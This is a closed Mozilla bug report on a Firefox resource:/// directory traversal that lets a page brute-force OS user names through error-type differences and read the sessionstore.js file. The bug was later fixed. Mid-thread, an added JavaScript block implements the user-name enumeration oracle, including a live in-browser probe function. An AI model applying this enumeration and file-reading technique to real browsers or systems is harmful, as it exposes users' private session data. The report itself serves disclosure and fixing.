Closed Bug 417400 Opened 13 years ago Closed 12 years ago

Resource Directory Traversal Vulnerability - Mac OS X and Linux Example

Categories

(Core :: Security, defect)

PowerPC
macOS
defect
Not set
normal

RESOLVED FIXED

People

(Reporter: gfleischer+bugzilla, Assigned: dveditz)

Details

(Keywords: verified1.8.1.17, verified1.9.0.2, Whiteboard: [sg:dupe 380994])

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

On Mac OS X and Linux, the "resource:///" directory traversal described in bug 394075 can be used to reach any file on the file system.

Because there is a different error returned for JavaScript for non-existent files versus files that have syntax errors, a brute-force attack could be mounted to determine the OS user name by attempting to source script files from their home directory.

If the operating system user name can be brute-forced (or otherwise determined) and the profile value determined through an information leak, the "sessionstore.js" file can be read if it is stored in the default location.


Reproducible: Always

Steps to Reproduce:
1.
2.
3.
If the OS user name and profile value can be determined, it is possible to read the sessionstore.js file.

Note also that different errors are returned for invalid (or unreachable) user name values compared to users that exist.
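The error-type oracle the report describes, as an added example that is not the reporter's test case and not code from the bug: sourcing a non-script file out of a candidate home directory either fails to load (the path does not exist) or loads and throws a SyntaxError (the path exists), so the two error classes tell an attacker which OS user names are real. The traversal prefix and the probed `.profile` file name are assumed placeholders, not the actual strings from bug 394075 or bug 380994, and the fake probe is a constructed stand-in for the file system so the logic can be exercised offline.

```javascript
'use strict';

// Added example, not code from the bug report. Models the error-type oracle:
// a <script src> that cannot be fetched reports a load error, while a fetched
// file that is not JavaScript reports a SyntaxError. The traversal prefix and
// the probed file name are assumed placeholders, not the real strings from
// bug 394075 / bug 380994.

const TRAVERSAL_PREFIX = 'resource:///TRAVERSAL_PLACEHOLDER/'; // assumed

// Build the probe URL for one candidate. '.profile' is an assumed file name;
// any file that exists in most home directories and is not valid JS will do.
function probeUrl(userName, homeRoot) {
  return `${TRAVERSAL_PREFIX}${homeRoot}/${encodeURIComponent(userName)}/.profile`;
}

// Map what the browser reported for one script load onto the oracle:
//   'load-error'   the URL could not be fetched        -> path missing
//   'syntax-error' fetched, but not parseable as JS    -> path exists
//   'executed'     fetched and ran                     -> path exists
function classify(outcome) {
  switch (outcome) {
    case 'load-error': return 'missing';
    case 'syntax-error':
    case 'executed': return 'exists';
    default: throw new Error(`unknown outcome: ${outcome}`);
  }
}

// Brute-force driver. `probe(url)` returns one of the outcome strings above.
// `homeRoot` is 'Users' on Mac OS X and 'home' on Linux.
function findExistingUsers(candidates, probe, homeRoot = 'Users') {
  return candidates.filter(
    (name) => classify(probe(probeUrl(name, homeRoot))) === 'exists');
}

// Constructed stand-in for the file system: only the listed users have a
// home directory containing .profile, so only they yield a SyntaxError.
function makeFakeProbe(existingUsers, homeRoot = 'Users') {
  const re = new RegExp(`/${homeRoot}/([^/]+)/\\.profile$`);
  return (url) => {
    const m = re.exec(url);
    const user = m ? decodeURIComponent(m[1]) : null;
    return user !== null && existingUsers.includes(user) ? 'syntax-error' : 'load-error';
  };
}

// Browser-side probe for comparison (not exercised offline). A fetch failure
// fires the element's error event; a SyntaxError in a fetched file fires the
// window's error event and then the element's load event.
function browserProbe(url) {
  return new Promise((resolve) => {
    const s = document.createElement('script');
    let sawSyntaxError = false;
    const onWindowError = () => { sawSyntaxError = true; };
    const done = (outcome) => {
      window.removeEventListener('error', onWindowError);
      s.remove();
      resolve(outcome);
    };
    window.addEventListener('error', onWindowError);
    s.onerror = () => done('load-error');
    s.onload = () => done(sawSyntaxError ? 'syntax-error' : 'executed');
    s.src = url;
    document.head.appendChild(s);
  });
}

// Constructed sample run: 'alice' and 'carol' exist, 'root' and 'bob' do not.
const sampleProbe = makeFakeProbe(['alice', 'carol']);
const sampleResult = findExistingUsers(['root', 'alice', 'bob', 'carol'], sampleProbe);
console.log(sampleResult);
```

Once a user name is confirmed, the same oracle applies to the profile directory name the reporter mentions, which is why the fix for bug 380994 (closing the traversal) rather than equalising the error messages is what actually removes the leak.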

This is basically a dupe of bug 380994, customized with a juicy target from the flat-chrome traversal bug. Very clever attempt to read the salted profile name. Another way to get that name is that sometimes it can be read from uncaught exceptions thrown by addon components (not code in chrome URIs, which isn't going to help much, but accompanying JavaScript XPCOM components, which will have file: URIs in the error).
Whiteboard: [sg:dupe 380994]
Assignee: nobody → dveditz
Product: Firefox → Core
QA Contact: firefox → toolkit
Fix for bug 380994 checked into 1.8 and 1.9.0 branches
Status: UNCONFIRMED → NEW
Ever confirmed: true
Verified on latest Mac/Linux build candidates for 20017 and 3.0.2 using the test case in comment #1. When running the test case on 20016 and 3.0.1 I could see the contents of my sessionstore.js file; on 20017 and 3.0.2 nothing happens.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Group: core-security
bug 380994 checked in:
http://hg.mozilla.org/mozilla-central/rev/6dad95d60106
http://hg.mozilla.org/mozilla-central/rev/1eccc541661c
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED